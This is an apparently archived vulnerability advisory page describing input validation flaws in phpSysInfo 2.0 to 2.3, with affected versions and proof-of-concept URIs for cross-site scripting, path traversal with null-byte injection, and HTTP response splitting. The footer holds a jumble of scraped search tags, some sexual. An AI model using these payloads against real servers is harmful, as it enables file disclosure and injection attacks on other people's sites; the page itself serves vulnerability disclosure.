about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPSysInfo Multiple Input Validation Vulnerabilities


Title PHPSysInfo Multiple Input Validation Vulnerabilities
Published 2005-11-11-12:00AM
Updated 2005-11-11-08:00PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  These issues were disclosed in the referenced Hardened-PHP Project advisory.
Vulnerable  phpSysInfo phpSysInfo 2.3
phpSysInfo phpSysInfo 2.1
phpSysInfo phpSysInfo 2.0
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia32
Debian Linux 3.0 ia64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
Not Vulnerable  phpSysInfo phpSysInfo 2.4
Code   No exploit is required.

The following proof of concept URI are available:
http://www.example.com/index.php?VERSION=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

http://www.example.com/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00
http://www.example.com/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00&lng=../../README%00
http://www.example.com//index.php?sensor_program=lmsensors.inc.php/../../README%00

http://www.example.com/index.php?charset=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Hacked!</html>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 18:03:22 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
SEXYVEDIOS iplay vuln phpLinks news for c Sex Doctor vidio se video secu Nude aish SECX Www.desipo GET /galle big ass se news+for+c seks hot www.google Crack Data CMS is Fre SEX VEDUO CMS is Fre Invision P www.trish indian fre ip board 2 qboard www.89.c0m Women fuck faingc age of emp www.006w.c tamilactre sex apache mim indiandesh WALLPAPER zeroboard sex of tri freebsd ex Sex Doctor CMS is Fre Ver t77t gillian an news for C 200 /compo vidiosexy t77t p...tion=c dina loren WWW.SEXY W Mobile ant